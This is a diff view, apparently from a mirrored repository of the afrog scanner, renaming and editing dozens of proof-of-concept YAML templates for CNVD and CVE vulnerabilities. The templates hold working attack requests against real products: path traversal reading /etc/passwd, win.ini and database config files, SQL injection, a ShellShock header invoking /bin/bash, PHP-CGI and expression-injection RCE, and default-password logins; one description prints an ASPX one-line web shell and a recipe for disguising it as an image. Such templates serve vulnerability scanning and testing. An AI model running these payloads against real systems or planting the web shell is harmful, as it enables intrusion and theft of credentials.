STRLCPY/afrog

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/resin-cnnvd-200705-315.yml afrog-pocs/CNVD/2007/CNVD-200705-315.yaml

1		-	id: resin-cnnvd-200705-315
	1	+	id: CNNVD-200705-315
2	2
3	3		info:
4		-	name: resin-cnnvd-200705-315
	4	+	name: Caucho Resin Information Disclosure
5	5		author: whynot(https://github.com/notwhy)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /%20../web-inf/
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.body.bcontains(b"/ ../web-inf/") && response.body.bcontains(b"Directory of /")
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/CNVD/2017/CNVD-2017-20077.yaml

1	+	id: CNVD-2017-20077
2	+
3	+	info:
4	+	name: Ueditor编辑器.net版本存在文件上传漏洞
5	+	author: zan8in
6	+	severity: critical
7	+	description: \|
8	+	<form action="http://8.8.8.8:8001/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
9	+	http://vps/11.jpg?.aspx 11.jpg是图片马；制作图片马：copy 1.jpg/b +2.aspx 3.aspx
10	+	aspx一句话：<%@ Page Language="Jscript"%><%eval(Request.Item["zan8in"],"unsafe");%>
11	+	reference:
12	+	- https://www.CNVD.org.cn/flaw/show/CNVD-2017-20077
13	+	- https://zhuanlan.zhihu.com/p/85265552
14	+	- https://www.freebuf.com/vuls/181814.html
15	+
16	+	rules:
17	+	r0:
18	+	request:
19	+	method: GET
20	+	path: /ueditor/net/controller.ashx?action=catchimage&encode=utf-8
21	+	headers:
22	+	Accept-Encoding: 'deflate'
23	+	follow_redirects: false
24	+	expression: \|
25	+	response.status == 200 && response.body.bcontains(bytes(string("没有指定抓取源")))
26	+	expression: r0()

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/metinfo-lfi-cnvd-2018-13393.yml afrog-pocs/CNVD/2018/CNVD-2018-13393.yaml

1		-	id: metinfo-lfi-cnvd-2018-13393
	1	+	id: CNVD-2018-13393
2	2
3	3		info:
4		-	name: metinfo-lfi-cnvd-2018-13393
	4	+	name: Metinfo file read
5	5		author: JingLing(https://hackfun.org/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /include/thumb.php?dir=http\..\admin\login\login_check.php
16	13		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/xiuno-bbs-cvnd-2019-01348-reinstallation.yml afrog-pocs/CNVD/2019/CNVD-2019-01348.yaml

1		-	id: xiuno-bbs-cvnd-2019-01348-reinstallation
	1	+	id: CNVD-2019-01348
2	2
3	3		info:
4		-	name: xiuno-bbs-cvnd-2019-01348-reinstallation
	4	+	name: Xiuno BBS CNVD-2019-01348
5	5		author: 清风明月(www.secbook.info)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /install/
16	13		headers:
17	14		Accept-Encoding: deflate
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.body.bcontains(bytes(string("/view/js/xiuno.js"))) && response.body.bcontains(bytes(string("Choose Language (选择语言)")))
20	16		expression: r0()
21	17
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/coremail-cnvd-2019-16798.yml afrog-pocs/CNVD/2019/CNVD-2019-16798.yaml

1		-	id: coremail-cnvd-2019-16798
	1	+	id: CNVD-2019-16798
2	2
3	3		info:
4		-	name: coremail-cnvd-2019-16798
	4	+	name: Coremail Information Disclosure
5	5		author: cc_ci(https://github.com/cc8ci)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
		skipped 8 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/discuz-ml3x-cnvd-2019-22239.yml afrog-pocs/CNVD/2019/CNVD-2019-22239.yaml

1		-	id: discuz-ml3x-cnvd-2019-22239
	1	+	id: CNVD-2019-22239
2	2
3	3		info:
4		-	name: discuz-ml3x-cnvd-2019-22239
	4	+	name: Discuz!ML 3.x 任意代码执行
5	5		author: X.Yang
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: GET
17	14		path: /forum.php
18		-	follow_redirects: false
19	15		expression: response.status == 200
20	16		output:
21	17		search: '"cookiepre = ''(?P<token>[\\w_]+)''".bsubmatch(response.body)'
22	18		token: search["token"]
23	19		r1:
24	20		request:
25		-	cache: true
26	21		method: GET
27	22		path: /forum.php
28	23		headers:
29	24		Cookie: '{{token}}language=sc''.print(md5({{r1}})).'''
30		-	follow_redirects: false
31	25		expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
32	26		expression: r0() && r1()
33	27

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/joomla-cnvd-2019-34135-rce.yml afrog-pocs/CNVD/2019/CNVD-2019-34135.yaml

1		-	id: joomla-cnvd-2019-34135-rce
	1	+	id: CNVD-2019-34135
2	2
3	3		info:
4		-	name: joomla-cnvd-2019-34135-rce
	4	+	name: Joomla configuration.php RCE
5	5		author: X.Yang
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomLowercase(10)
12	10		r2: randomLowercase(10)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /
19	16		headers:
		skipped 5 lines
25	22		token: search["token"]
26	23		r1:
27	24		request:
28		-	cache: true
29	25		method: POST
30	26		path: /
31	27		headers:
		skipped 7 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/xunchi-cnvd-2020-23735-file-read.yml afrog-pocs/CNVD/2020/CNVD-2020-23735.yaml

1		-	id: xunchi-cnvd-2020-23735-file-read
	1	+	id: CNVD-2020-23735
2	2
3	3		info:
4		-	name: xunchi-cnvd-2020-23735-file-read
	4	+	name: Xxunchi Local File read
5	5		author: 清风明月(www.secbook.info)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php
16	13		headers:
17	14		Accept-Encoding: deflate
18		-	follow_redirects: false
19	15		expression: response.status == 200 && response.body.bcontains(bytes(string("NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"))) && response.body.bcontains(bytes(string("display_errors")))
20	16		expression: r0()
21	17
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/e-zkeco-cnvd-2020-57264-read-file.yml afrog-pocs/CNVD/2020/CNVD-2020-57264.yaml

1		-	id: e-zkeco-cnvd-2020-57264-read-file
	1	+	id: CNVD-2020-57264
2	2
3	3		info:
4		-	name: e-zkeco-cnvd-2020-57264-read-file
	4	+	name: e-zkeco-CNVD-2020-57264-read-file
5	5		author: ThestaRY (https://github.com/ThestaRY7/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /iclock/ccccc/windows/win.ini
16	13		expression: response.status == 200 && response.body.bcontains(b"for 16-bit app support")
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/ecshop-cnvd-2020-58823-sqli.yml afrog-pocs/CNVD/2020/CNVD-2020-58823.yaml

1		-	id: ecshop-cnvd-2020-58823-sqli
	1	+	id: CNVD-2020-58823
2	2
3	3		info:
4		-	name: ecshop-cnvd-2020-58823-sqli
	4	+	name: ecshop-CNVD-2020-58823-sqli
5	5		author: 凉风(http://webkiller.cn/)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /delete_cart_goods.php
18	15		body: id=0\|\|(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1))
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cnvd/2020/seeyon-cnvd-2020-62422-readfile.yml afrog-pocs/CNVD/2020/CNVD-2020-62422.yaml

1	1		id: CNVD-2020-62422
2	2
3	3		info:
4		-	name: seeyon-cnvd-2020-62422-readfile
	4	+	name: 致远oa系统存在任意文件读取漏洞
5	5		author: Aquilao(https://github.com/Aquilao)
6	6		severity: medium
7	7		reference:
8		-	- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422
9		-	tags: seeyon,cnvd
	8	+	- https://www.CNVD.org.cn/flaw/show/CNVD-2020-62422
10	9
11		-	manual: true
12		-	transport: http
13	10		rules:
14	11		r0:
15	12		request:
16		-	cache: true
17	13		method: GET
18	14		path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
19		-	follow_redirects: false
20	15		expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
21	16		expression: r0()
22	17

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/h5s-video-platform-cnvd-2020-67113-unauth.yml afrog-pocs/CNVD/2020/CNVD-2020-67113.yaml

1		-	id: h5s-video-platform-cnvd-2020-67113-unauth
	1	+	id: CNVD-2020-67113
2	2
3	3		info:
4		-	name: h5s-video-platform-cnvd-2020-67113-unauth
	4	+	name: H5S CONSOLE 存在未授权访问
5	5		author: iak3ec(https://github.com/nu0l)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		h5s1:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /api/v1/GetSrc
16	13		expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_AUTO") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
17	14		h5s2:
18	15		request:
19		-	cache: true
20	16		method: GET
21	17		path: /api/v1/GetDevice
22	18		expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"H5_DEV") && response.body.bcontains(b"strUser") && response.body.bcontains(b"strPasswd")
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/CNVD/2021/CNVD-2021-04128.yaml

1	+	id: CNVD-2021-04128
2	+
3	+	info:
4	+	name: Datang AC Default Password
5	+	author: B1anda0(https://github.com/B1anda0)
6	+	severity: high
7	+
8	+	rules:
9	+	r0:
10	+	request:
11	+	method: POST
12	+	path: /login.cgi
13	+	body: user=admin&password1=%E8%AF%B7%E8%BE%93%E5%85%A5%E5%AF%86%E7%A0%81&password=123456&Submit=%E7%AB%8B%E5%8D%B3%E7%99%BB%E5%BD%95
14	+	expression: response.status == 200 && response.headers["set-cookie"].contains("ac_userid=admin,ac_passwd=") && response.body.bcontains(b"window.open('index.htm?_")
15	+	expression: r0()
16	+
17	+

■ ■ ■ ■ ■ ■

afrog-pocs/cnvd/2021/cnvd-2021-09650.yml afrog-pocs/CNVD/2021/CNVD-2021-09650.yaml

1		-	id: cnvd-2021-09650
	1	+	id: CNVD-2021-09650
2	2
3	3		info:
4		-	name: ruijie-eweb-rce-cnvd-2021-09650
	4	+	name: 锐捷网络股份有限公司NBR路由器EWEB网管系统存在命令执行漏洞
5	5		author: White(https://github.com/WhiteHSBG)
6	6		severity: high
7		-	tags: huijietong,lfi
8	7		reference:
9	8		- https://xz.aliyun.com/t/9016?page=1
10	9		- https://www.ruijie.com.cn/gy/xw-aqtg-gw/86747/
11	10
12		-	manual: true
13		-	transport: http
14	11		set:
15	12		r1: randomLowercase(4)
16	13		r2: randomLowercase(4)
		skipped 3 lines
20	17		rules:
21	18		r0:
22	19		request:
23		-	cache: true
24	20		method: POST
25	21		path: /guest_auth/guestIsUp.php
26	22		body: \|
		skipped 1 lines
28	24		expression: response.status == 200 && !response.body.bcontains(b'"success":false')
29	25		r1:
30	26		request:
31		-	cache: true
32	27		method: GET
33	28		path: /guest_auth/{{r2}}.php
34	29		expression: response.status == 200 && response.body.bcontains(bytes(r1)) && !response.body.bcontains(b'"success":false')
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/eea-info-leak-cnvd-2021-10543.yml afrog-pocs/CNVD/2021/CNVD-2021-10543.yaml

1		-	id: eea-info-leak-cnvd-2021-10543
	1	+	id: CNVD-2021-10543
2	2
3	3		info:
4		-	name: eea-info-leak-cnvd-2021-10543
	4	+	name: EEA Information Disclosure
5	5		author: Search?=Null
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /authenticationserverservlet
16	13		expression: response.status == 200 && "<username>(.?)</username>".bmatches(response.body) && "<password>(.?)</password>".bmatches(response.body)
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cnvd/2021/ruijie-uac-cnvd-2021-14536.yml afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml

1		-	id: ruijie-uac-cnvd-2021-14536
	1	+	id: CNVD-2021-14536
2	2
3	3		info:
4		-	name: ruijie-uac-cnvd-2021-14536
	4	+	name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
5	5		author: jweny(https://github.com/jweny)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /login.php
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/shopxo-cnvd-2021-15822.yml afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml

1		-	id: shopxo-cnvd-2021-15822
	1	+	id: CNVD-2021-15822
2	2
3	3		info:
4		-	name: shopxo-cnvd-2021-15822
	4	+	name: ShopXO File Read
5	5		author: Print1n(http://print1n.top)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		Linux0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q=
16		-	follow_redirects: false
17	13		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
18	14		Windows0:
19	15		request:
20		-	cache: true
21	16		method: GET
22	17		path: /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ=
23		-	follow_redirects: false
24	18		expression: response.status == 200 && response.body.bcontains(b"extensions") && response.body.bcontains(b"for 16-bit app support")
25	19		expression: Linux0() \|\| Windows0()
26	20
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/wifisky-default-password-cnvd-2021-39012.yml afrog-pocs/CNVD/2021/CNVD-2021-39012.yaml

1		-	id: wifisky-default-password-cnvd-2021-39012
	1	+	id: CNVD-2021-39012
2	2
3	3		info:
4		-	name: wifisky-default-password-cnvd-2021-39012
	4	+	name: Wifisky Default Password
5	5		author: Print1n(http://print1n.top)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /login.php?action=login&type=admin
16	13		body: username=admin&password=admin
17		-	follow_redirects: false
18	14		expression: response.status == 200 && response.body.bcontains(b"{\"success\":\"true\", \"data\":{\"id\":1}, \"alert\":\"您正在使用默认密码登录，为保证设备安全，请立即修改密码\"}")
19	15		expression: r0()
20	16

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2010/jboss-cve-2010-1871.yml afrog-pocs/CVE/2010/CVE-2010-1871.yaml

1		-	id: jboss-cve-2010-1871
	1	+	id: CVE-2010-1871
2	2
3	3		info:
4		-	name: jboss-cve-2010-1871
	4	+	name: JBoss CVE-2010-1871
5	5		author: fuping
6	6		severity: medium
7	7		reference:
8	8		- http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
9	9		- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871
10	10
11		-	manual: true
12		-	transport: http
13	11		set:
14	12		r1: randomInt(8000000, 10000000)
15	13		r2: randomInt(8000000, 10000000)
16	14		rules:
17	15		r0:
18	16		request:
19		-	cache: true
20	17		method: GET
21	18		path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d
22		-	follow_redirects: false
23	19		expression: response.status == 302 && response.headers["location"].contains(string(r1 * r2))
24	20		expression: r0()
25	21
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/coldfusion-cve-2010-2861-lfi.yml afrog-pocs/CVE/2010/CVE-2010-2861.yaml

1		-	id: coldfusion-cve-2010-2861-lfi
	1	+	id: CVE-2010-2861
2	2
3	3		info:
4		-	name: coldfusion-cve-2010-2861-lfi
	4	+	name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
5	5		author: sharecast
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
16	13		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/php-cgi-cve-2012-1823.yml afrog-pocs/CVE/2012/CVE-2012-1823.yaml

1		-	id: php-cgi-cve-2012-1823
	1	+	id: CVE-2012-1823
2	2
3	3		info:
4		-	name: php-cgi-cve-2012-1823
	4	+	name: PHP CGI v5.3.12/5.4.2 RCE
5	5		author: 17bdw
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		rand: randomInt(200000000, 210000000)
12	10		rules:
13	11		r0:
14	12		request:
15		-	cache: true
16	13		method: POST
17	14		path: /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
18	15		body: <?php echo md5({{rand}}); ?>
19		-	follow_redirects: false
20	16		expression: response.body.bcontains(bytes(md5(string(rand))))
21	17		expression: r0()
22	18
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2014/elasticsearch-cve-2014-3120.yml afrog-pocs/CVE/2014/CVE-2014-3120.yaml

1		-	id: elasticsearch-cve-2014-3120
	1	+	id: CVE-2014-3120
2	2
3	3		info:
4		-	name: elasticsearch-cve-2014-3120
	4	+	name: Elasticsearch CVE-2014-3120
5	5		author: suancaiyu、violin
6	6		severity: medium
7	7		description: fofa app="elastic-Elasticsearch"
8	8
9		-	manual: true
10		-	transport: http
11	9		set:
12	10		r: randomInt(800000000, 1000000000)
13	11		r1: randomInt(800000000, 1000000000)
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: POST
19	16		path: /test/test1/123
20	17		headers:
		skipped 5 lines
26	23		expression: response.status == 201 \|\| response.status == 200
27	24		r1:
28	25		request:
29		-	cache: true
30	26		method: POST
31	27		path: /_search
32	28		headers:
		skipped 22 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/drupal-cve-2014-3704-sqli.yml afrog-pocs/CVE/2014/CVE-2014-3704.yaml

1		-	id: drupal-cve-2014-3704-sqli
	1	+	id: CVE-2014-3704
2	2
3	3		info:
4		-	name: drupal-cve-2014-3704-sqli
5		-	author:
	4	+	name: Drupal SQL Injection
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: POST
15	12		path: /?q=node&destination=node
16	13		body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
17		-	follow_redirects: false
18	14		expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
19	15		expression: r0()
20	16
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/bash-cve-2014-6271.yml afrog-pocs/CVE/2014/CVE-2014-6271.yaml

1		-	id: bash-cve-2014-6271
	1	+	id: CVE-2014-6271
2	2
3	3		info:
4		-	name: bash-cve-2014-6271
	4	+	name: ShellShock - Remote Code Execution
5	5		author: neal1991(https://github.com/neal1991)
6		-	severity: high
	6	+	severity: critical
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(800000000, 1000000000)
12	10		r2: randomInt(800000000, 1000000000)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		headers:
19	16		User-Agent: () { :; }; echo; echo; /bin/bash -c 'expr {{r1}} + {{r2}}'
20		-	follow_redirects: false
21	17		expression: response.body.bcontains(bytes(string(r1 + r2)))
22	18		expression: r0()
23	19

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2015/elasticsearch-cve-2015-1427.yml afrog-pocs/CVE/2015/CVE-2015-1427.yaml

1		-	id: elasticsearch-cve-2015-1427
	1	+	id: CVE-2015-1427
2	2
3	3		info:
4		-	name: elasticsearch-cve-2015-1427
	4	+	name: Elasticsearch CVE-2015-1427
5	5		author: pululin(https://github.com/pululin)
6	6		severity: high
7	7		description: fofa app="elastic-Elasticsearch"
8	8
9		-	manual: true
10		-	transport: http
11	9		set:
12	10		r1: randomInt(40000, 44800)
13	11		r2: randomInt(40000, 44800)
14	12		rules:
15	13		r0:
16	14		request:
17		-	cache: true
18	15		method: POST
19	16		path: /test/test
20	17		headers:
		skipped 5 lines
26	23		expression: response.status == 201
27	24		r1:
28	25		request:
29		-	cache: true
30	26		method: POST
31	27		path: /_search
32	28		headers:
		skipped 14 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2015/elasticsearch-cve-2015-3337-lfi.yml afrog-pocs/CVE/2015/CVE-2015-3337.yaml

1		-	id: elasticsearch-cve-2015-3337-lfi
	1	+	id: CVE-2015-3337
2	2
3	3		info:
4		-	name: elasticsearch-cve-2015-3337-lfi
	4	+	name: Elasticsearch CVE-2015-3337
5	5		author: X.Yang
6	6		severity: medium
7	7		description: fofa app="elastic-Elasticsearch"
8	8
9		-	manual: true
10		-	transport: http
11	9		rules:
12	10		r0:
13	11		request:
14		-	cache: true
15	12		method: GET
16	13		path: /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd
17	14		expression: response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2015/elasticsearch-cve-2015-5531.yml afrog-pocs/CVE/2015/CVE-2015-5531.yaml

1		-	id: elasticsearch-cve-2015-5531
	1	+	id: CVE-2015-5531
2	2
3	3		info:
4		-	name: elasticsearch-cve-2015-5531
	4	+	name: Elasticsearch CVE-2015-5531
5	5		author: ha9worm(https://github.com/ha9worm)
6	6		severity: medium
7	7		description: fofa app="elastic-Elasticsearch"
8	8
9		-	manual: true
10		-	transport: http
11	9		set:
12	10		r1: randomLowercase(4)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: PUT
18	15		path: /_snapshot/{{r1}}
19	16		headers:
		skipped 9 lines
29	26		expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
30	27		r1:
31	28		request:
32		-	cache: true
33	29		method: PUT
34	30		path: /_snapshot/{{r1}}2
35	31		headers:
		skipped 9 lines
45	41		expression: response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"{\"acknowledged\":true}")
46	42		r2:
47	43		request:
48		-	cache: true
49	44		method: GET
50	45		path: /_snapshot/{{r1}}/backdata%2f..%2f..%2f..%2fconfig%2felasticsearch.yml
51	46		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/joomla-cve-2015-7297-sqli.yml afrog-pocs/CVE/2015/CVE-2015-7297.yaml

1		-	id: joomla-cve-2015-7297-sqli
	1	+	id: CVE-2015-7297
2	2
3	3		info:
4		-	name: joomla-cve-2015-7297-sqli
5		-	author:
	4	+	name: Joomla Core SQL Injection
	5	+	author: unkown
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=updatexml(0x23,concat(1,md5(8888)),1)
16	13		expression: response.body.bcontains(b"cf79ae6addba60ad018347359bd144d2")
		skipped 2 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/confluence-cve-2015-8399.yml afrog-pocs/CVE/2015/CVE-2015-8399.yaml

1		-	id: confluence-cve-2015-8399
	1	+	id: CVE-2015-8399
2	2
3	3		info:
4		-	name: confluence-cve-2015-8399
	4	+	name: Atlassian Confluence configuration files read
5	5		author: whynot(https://github.com/notwhy)
6		-	severity: high
	6	+	severity: medium
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /spaces/viewdefaultdecorator.action?decoratorName
16		-	follow_redirects: false
17	13		expression: response.status == 200 && response.body.bcontains(b"confluence-init.properties") && response.body.bcontains(b"View Default Decorator")
18	14		expression: r0()
19	15

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2016/zabbix-cve-2016-10134-sqli.yml afrog-pocs/CVE/2016/CVE-2016-10134.yaml

1		-	id: zabbix-cve-2016-10134-sqli
	1	+	id: CVE-2016-10134
2	2
3	3		info:
4		-	name: zabbix-cve-2016-10134-sqli
	4	+	name: Zabbix CVE-2016-10134
5	5		author: sharecast
6		-	severity: high
	6	+	severity: critical
	7	+	reference:
	8	+	- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
7	9
8		-	manual: true
9		-	transport: http
10	10		set:
11	11		r: randomInt(2000000000, 2100000000)
12	12		rules:
13	13		r0:
14	14		request:
15		-	cache: true
16	15		method: GET
17	16		path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
18	17		follow_redirects: true
		skipped 3 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2016/CVE-2016-3088.yml afrog-pocs/CVE/2016/CVE-2016-3088.yaml

		skipped 9 lines
10	10		- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
11	11		- http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
12	12		- https://nvd.nist.gov/vuln/detail/CVE-2016-3088
13		-	tags: fileupload,cve,cve2016,apache,activemq
14		-	classification:
15		-	cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16		-	cvss-score: 9.80
17		-	cve-id: CVE-2016-3088
18		-	cwe-id: CWE-20
19	13
20		-	manual: true
21		-	transport: http
22	14		set:
23	15		fileContent: randomLowercase(6)
24	16		rules:
25	17		r0:
26	18		request:
27		-	cache: true
28	19		method: PUT
29	20		path: /fileserver/afrog-poc.txt
30	21		body: \|
		skipped 1 lines
32	23		expression: response.status == 204
33	24		r1:
34	25		request:
35		-	cache: true
36	26		method: GET
37	27		path: /fileserver/afrog-poc.txt
38		-	follow_redirects: false
39	28		expression: response.status == 200 && response.body.bcontains(bytes(fileContent))
40	29		expression: r0() && r1()
41	30
		skipped 1 lines

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/spring-cve-2016-4977.yml afrog-pocs/CVE/2016/CVE-2016-4977.yaml

1		-	id: spring-cve-2016-4977
	1	+	id: CVE-2016-4977
2	2
3	3		info:
4		-	name: spring-cve-2016-4977
	4	+	name: Spring Security OAuth2 Remote Command Execution
5	5		author: hanxiansheng26(https://github.com/hanxiansheng26)
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		set:
11	9		r1: randomInt(40000, 44800)
12	10		r2: randomInt(40000, 44800)
13	11		rules:
14	12		r0:
15	13		request:
16		-	cache: true
17	14		method: GET
18	15		path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test
19		-	follow_redirects: false
20	16		expression: response.body.bcontains(bytes(string(r1 * r2)))
21	17		expression: r0()
22	18

■ ■ ■ ■ ■ ■

afrog-pocs/unreviewed/glassfish-cve-2017-1000028-lfi.yml afrog-pocs/CVE/2017/CVE-2017-1000028.yaml

1		-	id: glassfish-cve-2017-1000028-lfi
	1	+	id: CVE-2017-1000028
2	2
3	3		info:
4		-	name: glassfish-cve-2017-1000028-lfi
	4	+	name: GlassFish LFI
5	5		author: sharecast
6	6		severity: high
7	7
8		-	manual: true
9		-	transport: http
10	8		rules:
11	9		r0:
12	10		request:
13		-	cache: true
14	11		method: GET
15	12		path: /theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF
16	13		follow_redirects: true
		skipped 4 lines

■ ■ ■ ■ ■ ■

afrog-pocs/cve/2017/weblogic-cve-2017-10271.yml afrog-pocs/CVE/2017/CVE-2017-10271.yaml

1	1		id: CVE-2017-10271
2	2
3	3		info:
4		-	name: CVE-2017-10271
	4	+	name: WebLogic XMLDecoder 反序列化漏洞 CVE-2017-10271
5	5		author: dr_set
6	6		severity: high
